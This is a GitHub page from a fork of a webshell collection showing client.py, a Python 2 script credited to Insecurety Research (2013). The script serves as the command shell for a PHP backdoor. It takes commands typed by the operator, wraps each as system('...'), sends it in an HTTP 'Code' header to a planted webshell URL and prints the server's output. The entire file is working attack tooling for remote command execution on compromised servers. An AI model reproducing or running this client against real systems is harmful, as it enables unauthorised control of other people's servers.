forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathclient.py
41 lines (37 loc) · 1.25 KB
/
client.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/python
# Client for the backdoor which
# uses HTTP CODE header for inserting code
# Got the idea after seeing this sort of payload
# dropped by a phpmyadmin exploit on rdot :)
# Is also good to learn how to use urllib
# and not be lazy arse with requests all of time!
# Insecurety Research (2013) - insecurety.net
import urllib2
import sys
def usage(program):
print "HTTP CODE Header Backdoor Command Shell"
print "Usage: %s <Backdoor URL>" %(program)
print "Example: %s http://www.test.com/webshell.php" %(program)
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
print "[+] Using %s as target" %(args[1])
print "[!] Popping a shell, type 'exit' to quit"
while True:
opener = urllib2.build_opener()
url = args[1]
cmd = raw_input('~$ ')
if cmd == "exit":
sys.exit(0)
else:
code = "system('%s');" %(cmd)
opener.addheaders.append(('Code', code))# %(str(code))
urllib2.install_opener(opener)
result = urllib2.urlopen(url).read()
print result
except Exception, e:
print e
if __name__ == "__main__":
main(sys.argv)